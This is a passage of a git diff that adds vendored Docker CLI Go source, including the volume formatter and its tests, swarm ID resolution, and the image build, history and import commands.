+	HeaderContext
+	v types.Volume
+}
+
+func (c *volumeContext) MarshalJSON() ([]byte, error) {
+	return marshalJSON(c)
+}
+
+func (c *volumeContext) Name() string {
+	c.AddHeader(volumeNameHeader)
+	return c.v.Name
+}
+
+func (c *volumeContext) Driver() string {
+	c.AddHeader(driverHeader)
+	return c.v.Driver
+}
+
+func (c *volumeContext) Scope() string {
+	c.AddHeader(scopeHeader)
+	return c.v.Scope
+}
+
+func (c *volumeContext) Mountpoint() string {
+	c.AddHeader(mountpointHeader)
+	return c.v.Mountpoint
+}
+
+func (c *volumeContext) Labels() string {
+	c.AddHeader(labelsHeader)
+	if c.v.Labels == nil {
+		return ""
+	}
+
+	var joinLabels []string
+	for k, v := range c.v.Labels {
+		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
+	}
+	return strings.Join(joinLabels, ",")
+}
+
+func (c *volumeContext) Label(name string) string {
+
+	n := strings.Split(name, ".")
+	r := strings.NewReplacer("-", " ", "_", " ")
+	h := r.Replace(n[len(n)-1])
+
+	c.AddHeader(h)
+
+	if c.v.Labels == nil {
+		return ""
+	}
+	return c.v.Labels[name]
+}
+
+func (c *volumeContext) Links() string {
+	c.AddHeader(linksHeader)
+	if c.v.UsageData == nil {
+		return "N/A"
+	}
+	return fmt.Sprintf("%d", c.v.UsageData.RefCount)
+}
+
+func (c *volumeContext) Size() string {
+	c.AddHeader(sizeHeader)
+	if c.v.UsageData == nil {
+		return "N/A"
+	}
+	return units.HumanSize(float64(c.v.UsageData.Size))
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
new file mode 100644
index 0000000000..9ec18b6916
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
@@ -0,0 +1,189 @@
+package formatter
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestVolumeContext(t *testing.T) {
+	volumeName := stringid.GenerateRandomID()
+
+	var ctx volumeContext
+	cases := []struct {
+		volumeCtx volumeContext
+		expValue  string
+		expHeader string
+		call      func() string
+	}{
+		{volumeContext{
+			v: types.Volume{Name: volumeName},
+		}, volumeName, volumeNameHeader, ctx.Name},
+		{volumeContext{
+			v: types.Volume{Driver: "driver_name"},
+		}, "driver_name", driverHeader, ctx.Driver},
+		{volumeContext{
+			v: types.Volume{Scope: "local"},
+		}, "local", scopeHeader, ctx.Scope},
+		{volumeContext{
+			v: types.Volume{Mountpoint: "mountpoint"},
+		}, "mountpoint", mountpointHeader, ctx.Mountpoint},
+		{volumeContext{
+			v: types.Volume{},
+		}, "", labelsHeader, ctx.Labels},
+		{volumeContext{
+			v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}},
+		}, "label1=value1,label2=value2", labelsHeader, ctx.Labels},
+	}
+
+	for _, c := range cases {
+		ctx = c.volumeCtx
+		v := c.call()
+		if strings.Contains(v, ",") {
+			compareMultipleValues(t, v, c.expValue)
+		} else if v != c.expValue {
+			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
+		}
+
+		h := ctx.FullHeader()
+		if h != c.expHeader {
+			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
+		}
+	}
+}
+
+func TestVolumeContextWrite(t *testing.T) {
+	cases := []struct {
+		context  Context
+		expected string
+	}{
+
+		// Errors
+		{
+			Context{Format: "{{InvalidFunction}}"},
+			`Template parsing error: template: :1: function "InvalidFunction" not defined
+`,
+		},
+		{
+			Context{Format: "{{nil}}"},
+			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
+`,
+		},
+		// Table format
+		{
+			Context{Format: NewVolumeFormat("table", false)},
+			`DRIVER              VOLUME NAME
+foo                 foobar_baz
+bar                 foobar_bar
+`,
+		},
+		{
+			Context{Format: NewVolumeFormat("table", true)},
+			`foobar_baz
+foobar_bar
+`,
+		},
+		{
+			Context{Format: NewVolumeFormat("table {{.Name}}", false)},
+			`VOLUME NAME
+foobar_baz
+foobar_bar
+`,
+		},
+		{
+			Context{Format: NewVolumeFormat("table {{.Name}}", true)},
+			`VOLUME NAME
+foobar_baz
+foobar_bar
+`,
+		},
+		// Raw Format
+		{
+			Context{Format: NewVolumeFormat("raw", false)},
+			`name: foobar_baz
+driver: foo
+
+name: foobar_bar
+driver: bar
+
+`,
+		},
+		{
+			Context{Format: NewVolumeFormat("raw", true)},
+			`name: foobar_baz
+name: foobar_bar
+`,
+		},
+		// Custom Format
+		{
+			Context{Format: NewVolumeFormat("{{.Name}}", false)},
+			`foobar_baz
+foobar_bar
+`,
+		},
+	}
+
+	for _, testcase := range cases {
+		volumes := []*types.Volume{
+			{Name: "foobar_baz", Driver: "foo"},
+			{Name: "foobar_bar", Driver: "bar"},
+		}
+		out := bytes.NewBufferString("")
+		testcase.context.Output = out
+		err := VolumeWrite(testcase.context, volumes)
+		if err != nil {
+			assert.Error(t, err, testcase.expected)
+		} else {
+			assert.Equal(t, out.String(), testcase.expected)
+		}
+	}
+}
+
+func TestVolumeContextWriteJSON(t *testing.T) {
+	volumes := []*types.Volume{
+		{Driver: "foo", Name: "foobar_baz"},
+		{Driver: "bar", Name: "foobar_bar"},
+	}
+	expectedJSONs := []map[string]interface{}{
+		{"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"},
+		{"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"},
+	}
+	out := bytes.NewBufferString("")
+	err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var m map[string]interface{}
+		if err := json.Unmarshal([]byte(line), &m); err != nil {
+			t.Fatal(err)
+		}
+		assert.DeepEqual(t, m, expectedJSONs[i])
+	}
+}
+
+func TestVolumeContextWriteJSONField(t *testing.T) {
+	volumes := []*types.Volume{
+		{Driver: "foo", Name: "foobar_baz"},
+		{Driver: "bar", Name: "foobar_bar"},
+	}
+	out := bytes.NewBufferString("")
+	err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var s string
+		if err := json.Unmarshal([]byte(line), &s); err != nil {
+			t.Fatal(err)
+		}
+		assert.Equal(t, s, volumes[i].Name)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
new file mode 100644
index 0000000000..511b1a8f54
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
@@ -0,0 +1,90 @@
+package idresolver
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+// IDResolver provides ID to Name resolution.
+type IDResolver struct {
+	client    client.APIClient
+	noResolve bool
+	cache     map[string]string
+}
+
+// New creates a new IDResolver.
+func New(client client.APIClient, noResolve bool) *IDResolver {
+	return &IDResolver{
+		client:    client,
+		noResolve: noResolve,
+		cache:     make(map[string]string),
+	}
+}
+
+func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) {
+	switch t := t.(type) {
+	case swarm.Node:
+		node, _, err := r.client.NodeInspectWithRaw(ctx, id)
+		if err != nil {
+			return id, nil
+		}
+		if node.Spec.Annotations.Name != "" {
+			return node.Spec.Annotations.Name, nil
+		}
+		if node.Description.Hostname != "" {
+			return node.Description.Hostname, nil
+		}
+		return id, nil
+	case swarm.Service:
+		service, _, err := r.client.ServiceInspectWithRaw(ctx, id)
+		if err != nil {
+			return id, nil
+		}
+		return service.Spec.Annotations.Name, nil
+	case swarm.Task:
+		// If the caller passes the full task there's no need to do a lookup.
+		if t.ID == "" {
+			var err error
+
+			t, _, err = r.client.TaskInspectWithRaw(ctx, id)
+			if err != nil {
+				return id, nil
+			}
+		}
+		taskID := stringid.TruncateID(t.ID)
+		if t.ServiceID == "" {
+			return taskID, nil
+		}
+		service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID)
+		if err != nil {
+			return "", err
+		}
+		return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil
+	default:
+		return "", fmt.Errorf("unsupported type")
+	}
+
+}
+
+// Resolve will attempt to resolve an ID to a Name by querying the manager.
+// Results are stored into a cache.
+// If the `-n` flag is used in the command-line, resolution is disabled.
+func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) {
+	if r.noResolve {
+		return id, nil
+	}
+	if name, ok := r.cache[id]; ok {
+		return name, nil
+	}
+	name, err := r.get(ctx, t, id)
+	if err != nil {
+		return "", err
+	}
+	r.cache[id] = name
+	return name, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go
new file mode 100644
index 0000000000..0c88af5fcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/build.go
@@ -0,0 +1,477 @@
+package image
+
+import (
+	"archive/tar"
+	"bufio"
+	"bytes"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"regexp"
+	"runtime"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/dockerignore"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/docker/docker/reference"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type buildOptions struct {
+	context        string
+	dockerfileName string
+	tags           opts.ListOpts
+	labels         opts.ListOpts
+	buildArgs      opts.ListOpts
+	ulimits        *runconfigopts.UlimitOpt
+	memory         string
+	memorySwap     string
+	shmSize        string
+	cpuShares      int64
+	cpuPeriod      int64
+	cpuQuota       int64
+	cpuSetCpus     string
+	cpuSetMems     string
+	cgroupParent   string
+	isolation      string
+	quiet          bool
+	noCache        bool
+	rm             bool
+	forceRm        bool
+	pull           bool
+	cacheFrom      []string
+	compress       bool
+	securityOpt    []string
+	networkMode    string
+	squash         bool
+}
+
+// NewBuildCommand creates a new `docker build` command
+func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command {
+	ulimits := make(map[string]*units.Ulimit)
+	options := buildOptions{
+		tags:      opts.NewListOpts(validateTag),
+		buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv),
+		ulimits:   runconfigopts.NewUlimitOpt(&ulimits),
+		labels:    opts.NewListOpts(runconfigopts.ValidateEnv),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "build [OPTIONS] PATH | URL | -",
+		Short: "Build an image from a Dockerfile",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			options.context = args[0]
+			return runBuild(dockerCli, options)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format")
+	flags.Var(&options.buildArgs, "build-arg", "Set build-time variables")
+	flags.Var(options.ulimits, "ulimit", "Ulimit options")
+	flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')")
+	flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit")
+	flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
+	flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB")
+	flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
+	flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period")
+	flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota")
+	flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
+	flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
+	flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container")
+	flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology")
+	flags.Var(&options.labels, "label", "Set metadata for an image")
+	flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image")
+	flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build")
+	flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers")
+	flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success")
+	flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image")
+	flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources")
+	flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip")
+	flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options")
+	flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build")
+
+	command.AddTrustedFlags(flags, true)
+
+	flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer")
+	flags.SetAnnotation("squash", "experimental", nil)
+	flags.SetAnnotation("squash", "version", []string{"1.25"})
+
+	return cmd
+}
+
+// lastProgressOutput is the same as progress.Output except
+// that it only output with the last update. It is used in
+// non terminal scenarios to depresss verbose messages
+type lastProgressOutput struct {
+	output progress.Output
+}
+
+// WriteProgress formats progress information from a ProgressReader.
+func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error {
+	if !prog.LastUpdate {
+		return nil
+	}
+
+	return out.output.WriteProgress(prog)
+}
+
+func runBuild(dockerCli *command.DockerCli, options buildOptions) error {
+
+	var (
+		buildCtx      io.ReadCloser
+		err           error
+		contextDir    string
+		tempDir       string
+		relDockerfile string
+		progBuff      io.Writer
+		buildBuff     io.Writer
+	)
+
+	specifiedContext := options.context
+	progBuff = dockerCli.Out()
+	buildBuff = dockerCli.Out()
+	if options.quiet {
+		progBuff = bytes.NewBuffer(nil)
+		buildBuff = bytes.NewBuffer(nil)
+	}
+
+	switch {
+	case specifiedContext == "-":
+		buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName)
+	case urlutil.IsGitURL(specifiedContext):
+		tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName)
+	case urlutil.IsURL(specifiedContext):
+		buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName)
+	default:
+		contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName)
+	}
+
+	if err != nil {
+		if options.quiet && urlutil.IsURL(specifiedContext) {
+			fmt.Fprintln(dockerCli.Err(), progBuff)
+		}
+		return fmt.Errorf("unable to prepare context: %s", err)
+	}
+
+	if tempDir != "" {
+		defer os.RemoveAll(tempDir)
+		contextDir = tempDir
+	}
+
+	if buildCtx == nil {
+		// And canonicalize dockerfile name to a platform-independent one
+		relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile)
+		if err != nil {
+			return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err)
+		}
+
+		f, err := os.Open(filepath.Join(contextDir, ".dockerignore"))
+		if err != nil && !os.IsNotExist(err) {
+			return err
+		}
+		defer f.Close()
+
+		var excludes []string
+		if err == nil {
+			excludes, err = dockerignore.ReadAll(f)
+			if err != nil {
+				return err
+			}
+		}
+
+		if err := builder.ValidateContextDirectory(contextDir, excludes); err != nil {
+			return fmt.Errorf("Error checking context: '%s'.", err)
+		}
+
+		// If .dockerignore mentions .dockerignore or the Dockerfile
+		// then make sure we send both files over to the daemon
+		// because Dockerfile is, obviously, needed no matter what, and
+		// .dockerignore is needed to know if either one needs to be
+		// removed. The daemon will remove them for us, if needed, after it
+		// parses the Dockerfile. Ignore errors here, as they will have been
+		// caught by validateContextDirectory above.
+		var includes = []string{"."}
+		keepThem1, _ := fileutils.Matches(".dockerignore", excludes)
+		keepThem2, _ := fileutils.Matches(relDockerfile, excludes)
+		if keepThem1 || keepThem2 {
+			includes = append(includes, ".dockerignore", relDockerfile)
+		}
+
+		compression := archive.Uncompressed
+		if options.compress {
+			compression = archive.Gzip
+		}
+		buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{
+			Compression:     compression,
+			ExcludePatterns: excludes,
+			IncludeFiles:    includes,
+		})
+		if err != nil {
+			return err
+		}
+	}
+
+	ctx := context.Background()
+
+	var resolvedTags []*resolvedTag
+	if command.IsTrusted() {
+		translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) {
+			return TrustedReference(ctx, dockerCli, ref, nil)
+		}
+		// Wrap the tar archive to replace the Dockerfile entry with the rewritten
+		// Dockerfile which uses trusted pulls.
+		buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags)
+	}
+
+	// Setup an upload progress bar
+	progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true)
+	if !dockerCli.Out().IsTerminal() {
+		progressOutput = &lastProgressOutput{output: progressOutput}
+	}
+
+	var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon")
+
+	var memory int64
+	if options.memory != "" {
+		parsedMemory, err := units.RAMInBytes(options.memory)
+		if err != nil {
+			return err
+		}
+		memory = parsedMemory
+	}
+
+	var memorySwap int64
+	if options.memorySwap != "" {
+		if options.memorySwap == "-1" {
+			memorySwap = -1
+		} else {
+			parsedMemorySwap, err := units.RAMInBytes(options.memorySwap)
+			if err != nil {
+				return err
+			}
+			memorySwap = parsedMemorySwap
+		}
+	}
+
+	var shmSize int64
+	if options.shmSize != "" {
+		shmSize, err = units.RAMInBytes(options.shmSize)
+		if err != nil {
+			return err
+		}
+	}
+
+	authConfigs, _ := dockerCli.GetAllCredentials()
+	buildOptions := types.ImageBuildOptions{
+		Memory:         memory,
+		MemorySwap:     memorySwap,
+		Tags:           options.tags.GetAll(),
+		SuppressOutput: options.quiet,
+		NoCache:        options.noCache,
+		Remove:         options.rm,
+		ForceRemove:    options.forceRm,
+		PullParent:     options.pull,
+		Isolation:      container.Isolation(options.isolation),
+		CPUSetCPUs:     options.cpuSetCpus,
+		CPUSetMems:     options.cpuSetMems,
+		CPUShares:      options.cpuShares,
+		CPUQuota:       options.cpuQuota,
+		CPUPeriod:      options.cpuPeriod,
+		CgroupParent:   options.cgroupParent,
+		Dockerfile:     relDockerfile,
+		ShmSize:        shmSize,
+		Ulimits:        options.ulimits.GetList(),
+		BuildArgs:      runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()),
+		AuthConfigs:    authConfigs,
+		Labels:         runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()),
+		CacheFrom:      options.cacheFrom,
+		SecurityOpt:    options.securityOpt,
+		NetworkMode:    options.networkMode,
+		Squash:         options.squash,
+	}
+
+	response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions)
+	if err != nil {
+		if options.quiet {
+			fmt.Fprintf(dockerCli.Err(), "%s", progBuff)
+		}
+		return err
+	}
+	defer response.Body.Close()
+
+	err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil)
+	if err != nil {
+		if jerr, ok := err.(*jsonmessage.JSONError); ok {
+			// If no error code is set, default to 1
+			if jerr.Code == 0 {
+				jerr.Code = 1
+			}
+			if options.quiet {
+				fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff)
+			}
+			return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code}
+		}
+	}
+
+	// Windows: show error message about modified file permissions if the
+	// daemon isn't running Windows.
+	if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet {
+		fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`)
+	}
+
+	// Everything worked so if -q was provided the output from the daemon
+	// should be just the image ID and we'll print that to stdout.
+	if options.quiet {
+		fmt.Fprintf(dockerCli.Out(), "%s", buildBuff)
+	}
+
+	if command.IsTrusted() {
+		// Since the build was successful, now we must tag any of the resolved
+		// images from the above Dockerfile rewrite.
+		for _, resolved := range resolvedTags {
+			if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil {
+				return err
+			}
+		}
+	}
+
+	return nil
+}
+
+type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error)
+
+// validateTag checks if the given image name can be resolved.
+func validateTag(rawRepo string) (string, error) {
+	_, err := reference.ParseNamed(rawRepo)
+	if err != nil {
+		return "", err
+	}
+
+	return rawRepo, nil
+}
+
+var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P<image>[^ \f\r\t\v\n#]+)`)
+
+// resolvedTag records the repository, tag, and resolved digest reference
+// from a Dockerfile rewrite.
+type resolvedTag struct {
+	digestRef reference.Canonical
+	tagRef    reference.NamedTagged
+}
+
+// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in
+// "FROM <image>" instructions to a digest reference. `translator` is a
+// function that takes a repository name and tag reference and returns a
+// trusted digest reference.
+func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) {
+	scanner := bufio.NewScanner(dockerfile)
+	buf := bytes.NewBuffer(nil)
+
+	// Scan the lines of the Dockerfile, looking for a "FROM" line.
+	for scanner.Scan() {
+		line := scanner.Text()
+
+		matches := dockerfileFromLinePattern.FindStringSubmatch(line)
+		if matches != nil && matches[1] != api.NoBaseImageSpecifier {
+			// Replace the line with a resolved "FROM repo@digest"
+			ref, err := reference.ParseNamed(matches[1])
+			if err != nil {
+				return nil, nil, err
+			}
+			ref = reference.WithDefaultTag(ref)
+			if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() {
+				trustedRef, err := translator(ctx, ref)
+				if err != nil {
+					return nil, nil, err
+				}
+
+				line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String()))
+				resolvedTags = append(resolvedTags, &resolvedTag{
+					digestRef: trustedRef,
+					tagRef:    ref,
+				})
+			}
+		}
+
+		_, err := fmt.Fprintln(buf, line)
+		if err != nil {
+			return nil, nil, err
+		}
+	}
+
+	return buf.Bytes(), resolvedTags, scanner.Err()
+}
+
+// replaceDockerfileTarWrapper wraps the given input tar archive stream and
+// replaces the entry with the given Dockerfile name with the contents of the
+// new Dockerfile. Returns a new tar archive stream with the replaced
+// Dockerfile.
+func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser {
+	pipeReader, pipeWriter := io.Pipe()
+	go func() {
+		tarReader := tar.NewReader(inputTarStream)
+		tarWriter := tar.NewWriter(pipeWriter)
+
+		defer inputTarStream.Close()
+
+		for {
+			hdr, err := tarReader.Next()
+			if err == io.EOF {
+				// Signals end of archive.
+				tarWriter.Close()
+				pipeWriter.Close()
+				return
+			}
+			if err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+
+			content := io.Reader(tarReader)
+			if hdr.Name == dockerfileName {
+				// This entry is the Dockerfile. Since the tar archive was
+				// generated from a directory on the local filesystem, the
+				// Dockerfile will only appear once in the archive.
+				var newDockerfile []byte
+				newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator)
+				if err != nil {
+					pipeWriter.CloseWithError(err)
+					return
+				}
+				hdr.Size = int64(len(newDockerfile))
+				content = bytes.NewBuffer(newDockerfile)
+			}
+
+			if err := tarWriter.WriteHeader(hdr); err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+
+			if _, err := io.Copy(tarWriter, content); err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+		}
+	}()
+
+	return pipeReader
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go
new file mode 100644
index 0000000000..c3ca61f85b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/cmd.go
@@ -0,0 +1,33 @@
+package image
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewImageCommand returns a cobra command for `image` subcommands
+func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "image",
+		Short: "Manage images",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		NewBuildCommand(dockerCli),
+		NewHistoryCommand(dockerCli),
+		NewImportCommand(dockerCli),
+		NewLoadCommand(dockerCli),
+		NewPullCommand(dockerCli),
+		NewPushCommand(dockerCli),
+		NewSaveCommand(dockerCli),
+		NewTagCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		NewPruneCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go
new file mode 100644
index 0000000000..91c8f75a63
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/history.go
@@ -0,0 +1,99 @@
+package image
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"text/tabwriter"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type historyOptions struct {
+	image string
+
+	human   bool
+	quiet   bool
+	noTrunc bool
+}
+
+// NewHistoryCommand creates a new `docker history` command
+func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts historyOptions
+
+	cmd := &cobra.Command{
+		Use:   "history [OPTIONS] IMAGE",
+		Short: "Show the history of an image",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.image = args[0]
+			return runHistory(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format")
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs")
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
+
+	return cmd
+}
+
+func runHistory(dockerCli *command.DockerCli, opts historyOptions) error {
+	ctx := context.Background()
+
+	history, err := dockerCli.Client().ImageHistory(ctx, opts.image)
+	if err != nil {
+		return err
+	}
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
+
+	if opts.quiet {
+		for _, entry := range history {
+			if opts.noTrunc {
+				fmt.Fprintf(w, "%s\n", entry.ID)
+			} else {
+				fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID))
+			}
+		}
+		w.Flush()
+		return nil
+	}
+
+	var imageID string
+	var createdBy string
+	var created string
+	var size string
+
+	fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT")
+	for _, entry := range history {
+		imageID = entry.ID
+		createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1)
+		if !opts.noTrunc {
+			createdBy = stringutils.Ellipsis(createdBy, 45)
+			imageID = stringid.TruncateID(entry.ID)
+		}
+
+		if opts.human {
+			created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + " ago"
+			size = units.HumanSizeWithPrecision(float64(entry.Size), 3)
+		} else {
+			created = time.Unix(entry.Created, 0).Format(time.RFC3339)
+			size = strconv.FormatInt(entry.Size, 10)
+		}
+
+		fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment)
+	}
+	w.Flush()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go
new file mode 100644
index 0000000000..60024fb53c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/import.go
@@ -0,0 +1,88 @@
+package image
+
+import (
+	"io"
+	"os"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	dockeropts "github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/spf13/cobra"
+)
+
+type importOptions struct {
+	source    string
+	reference string
+	changes   dockeropts.ListOpts
+	message   string
+}
+
+// NewImportCommand creates a new `docker import` command
